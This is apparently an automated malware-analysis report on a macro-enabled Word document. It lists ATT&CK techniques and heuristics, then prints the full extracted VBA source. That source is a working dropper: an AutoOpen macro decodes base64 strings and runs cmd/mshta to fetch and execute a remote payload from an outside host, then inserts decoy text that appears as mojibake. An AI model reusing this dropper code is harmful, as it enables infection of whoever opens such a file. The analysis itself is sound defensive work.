MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The OOXML document contains VBA macros, including an AutoOpen macro that uses CreateObject and Shell execution. The presence of an AutoOpen macro and the 'SE_ENABLE_LURE' heuristic indicate the document is designed to trick the user into enabling macros to download and execute a secondary payload. The VBA code includes functions for HexToText and Base64ToHex conversion, suggesting obfuscation of malicious content.
Heuristics 6
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject("Scripting.FileSystemObject") Set objChars = CreateObject("Scripting.Dictionary") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() ' -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7021 bytes |
SHA-256: 7333b17f8083b68ee13dfc5ca62bbac98296238fef98e3bb5115ea7cd8592632 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function HexToText(strHex)
' Function to convert a string of hexadecimal bytes into a text string.
Dim strChar, k
HexToText = ""
For k = 1 To Len(strHex) Step 2
strChar = Mid(strHex, k, 2)
HexToText = HexToText & Chr("&H" & strChar)
Next
End Function
Function Base64ToHex(strValue, objChars)
' Function to convert a base64 encoded string into a hex string.
Dim lngValue, lngTemp, lngChar, intLen, k, j, intTerm, strHex
intLen = Len(strValue)
' Check padding.
intTerm = 0
If (Right(strValue, 1) = "=") Then
intTerm = 1
End If
If (Right(strValue, 2) = "==") Then
intTerm = 2
End If
' Parse into groups of 4 6-bit characters.
j = 0
lngValue = 0
Base64ToHex = ""
For k = 1 To intLen
j = j + 1
' Calculate 24-bit integer.
lngValue = (lngValue * 64) + objChars(Mid(strValue, k, 1))
If (j = 4) Then
' Convert 24-bit integer into 3 8-bit bytes.
lngTemp = Fix(lngValue / 256)
lngChar = lngValue - (256 * lngTemp)
strHex = Right("00" & Hex(lngChar), 2)
lngValue = lngTemp
lngTemp = Fix(lngValue / 256)
lngChar = lngValue - (256 * lngTemp)
strHex = Right("00" & Hex(lngChar), 2) & strHex
lngValue = lngTemp
lngTemp = Fix(lngValue / 256)
lngChar = lngValue - (256 * lngTemp)
strHex = Right("00" & Hex(lngChar), 2) & strHex
Base64ToHex = Base64ToHex & strHex
j = 0
lngValue = 0
End If
Next
' Account for padding.
Base64ToHex = Left(Base64ToHex, Len(Base64ToHex) - (intTerm * 2))
End Function
Sub AutoOpen()
'
' AutoOpen Macro
Dim Download As String
Dim encShellString As String
Dim decShellString As String
Dim RetVal As Long
Dim sSourceUrl As String
Dim sLocalFile As String
encShellString = "c2hlbGwuYXBwbGljYXRpb24="
Set fso = CreateObject("Scripting.FileSystemObject")
Set objChars = CreateObject("Scripting.Dictionary")
objChars.CompareMode = vbBinaryCompare
objChars.Add "A", 0
objChars.Add "B", 1
objChars.Add "C", 2
objChars.Add "D", 3
objChars.Add "E", 4
objChars.Add "F", 5
objChars.Add "G", 6
objChars.Add "H", 7
objChars.Add "I", 8
objChars.Add "J", 9
objChars.Add "K", 10
objChars.Add "L", 11
objChars.Add "M", 12
objChars.Add "N", 13
objChars.Add "O", 14
objChars.Add "P", 15
objChars.Add "Q", 16
objChars.Add "R", 17
objChars.Add "S", 18
objChars.Add "T", 19
objChars.Add "U", 20
objChars.Add "V", 21
objChars.Add "W", 22
objChars.Add "X", 23
objChars.Add "Y", 24
objChars.Add "Z", 25
objChars.Add "a", 26
objChars.Add "b", 27
objChars.Add "c", 28
objChars.Add "d", 29
objChars.Add "e", 30
objChars.Add "f", 31
objChars.Add "g", 32
objChars.Add "h", 33
objChars.Add "i", 34
objChars.Add "j", 35
objChars.Add "k", 36
objChars.Add "l", 37
objChars.Add "m", 38
objChars.Add "n", 39
objChars.Add "o", 40
objChars.Add "p", 41
objChars.Add "q", 42
objChars.Add "r", 43
objChars.Add "s", 44
objChars.Add "t", 45
objChars.Add "u", 46
objChars.Add "v", 47
objChars.Add "w", 48
objChars.Add "x", 49
objChars.Add "y", 50
objChars.Add "z", 51
objChars.Add "0", 52
objChars.Add "1", 53
objChars.Add "2", 54
objChars.Add "3", 55
objChars.Add "4", 56
objChars.Add "5", 57
objChars.Add "6", 58
objChars.Add "7", 59
objChars.Add "8", 60
objChars.Add "9", 61
objChars.Add "+", 62
objChars.Add "/", 63
decShellString = HexToText(Base64ToHex(encShellString, objChars))
' MsgBox ("Dec String is: " & decShellString)
wshellstring = HexToText(Base64ToHex("V1NjcmlwdC5TaGVsbA==", objChars))
Set WShell = CreateObject(wshellstring)
strHomeFolder = WShell.ExpandEnvironmentStrings("%APPDATA%")
indexPath = strHomeFolder & HexToText(Base64ToHex("XE1pY3Jvc29mdFxtaWIuZGF0", objChars))
' MsgBox (indexPath)
Set stream = fso.CreateTextFile(indexPath, True)
stream.Write "1111:lyx*05E46A118B23D460E625FE31"
Set oShell = CreateObject(decShellString)
oShell.ShellExecute HexToText(Base64ToHex("Y21kLmV4ZQ==", objChars)), HexToText(Base64ToHex("L2Mgc3RhcnQ=", objChars)) & " " & HexToText(Base64ToHex("bXNodGE=", objChars)) & " " & HexToText(Base64ToHex("aHR0cDovLw==", objChars)) & HexToText(Base64ToHex("a21icjEubml0ZXNicjEub3Jn", objChars)) & HexToText(Base64ToHex("L1VzZXJGaWxlcy9GaWxlL2ltYWdlL2hvbWUuaHRtbA==", objChars)), "", HexToText(Base64ToHex("b3Blbg==", objChars)), 0
WordShow
'L1VzZXJGaWxlcy9GaWxlL2ltYWdlL2hvbWUuaHRtbA==
End Sub
Sub WordShow()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=(101 - 100)
Word.ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
Word.ActiveDocument.Background.Fill.ForeColor.RGB = RGB(255, 255, 255)
Word.ActiveDocument.Background.Fill.Transparency = 0#
Dim shadows As Word.Document
Set shadows = ThisDocument
shadows.Range.InsertParagraphAfter
shadows.Range.InsertAfter "ʵ¼ÊÉÏ£¬Öз½ÍêÈ«Òâʶµ½Èý·½»áÎîÐû¸æµÄ¿ò¼ÜÒѾ½¨Á¢£¬Òò´ËÒª²ÎÓëÏÂÒ»²½¾ßÌåµÄÎ޺˻¯ÑéÖ¤ÓëºÍƽÐÒé̸ÅС£" + vbLf
shadows.Range.InsertAfter "ÓÉÓÚÖйúÊÇͣսж¨µÄǩԼ¹ú£¬ÖйúÓÐÒåÎñ²ÎÓë¡£" + vbLf
shadows.Range.InsertAfter "ÐÂ¼ÓÆÂ³¯ÃÀ·å»á²¢²»Êǽâ¾ö³¯Ïʰ뵺ÎÊÌâµÄÈ«Ãæ½â¾ö·½°¸£¬Ó¦ÊÓΪ½â¾öÎÊÌâ¹ý³ÌµÄÆðµã¡£" + vbLf
shadows.Range.InsertAfter "º«³¯ÃÀÐû¸æÖÕսж¨ÊÇÒ»¼þºÃÊ£¬µ«ÖÕÕ½ÐÒéȱ·¦Íêȫȡ´úÍ£Õ½ÐÒéµÄ·¨ÂÉÐÔ¡£" + vbLf
shadows.Range.InsertAfter "Èç¹ûÖйúÇ©ÊðºÍƽÐÒ飬Õ⽫±£Ö¤ÐÒéµÄÎȶ¨ÐÔ¡£" + vbLf
shadows.Range.InsertAfter "Öз½ÈÏΪÊ×ÏÈÒª½áÊøË«±ßÌôÕ½£¬Æä´ÎÓ¦¸Ã±£³ÖÒ»¸öÓÀ¾ÃºÍƽ״̬¡£" + vbLf
shadows.Range.InsertAfter "ÖйúÊdz¯Ïʰ뵺ÎÊÌâµÄÓйعú¼Ò£¬Öз½½«¼ÌÐø·¢»ÓÆä½ÇÉ«¡£" + vbLf
shadows.Range.InsertAfter "×ÜÖ®£¬Öйú×÷Ϊ½â¾ö³¯Ïʰ뵺ÎÊÌâµÄÓйعú£¬¶ÔÕâ´Î³¯Ïʰ뵺Î޺˻¯µÄ½ø³Ì¸Ðµ½ºÜ²»ÂúÒâ¡£" + vbLf
shadows.Range.InsertAfter "³ýÁËÖÕսж¨£¬´Ó³¯·½Î޺˻¯ÑéÖ¤µ½ºÍƽÌõÔ¼µÄÇ©Ê𽫶¼Òª²ÎÓë¡£" + vbLf
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 22016 bytes |
SHA-256: 51bc4c6f48fbe083a1232138794db4e43c1264e2094bb6c8427115cea66722cc |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.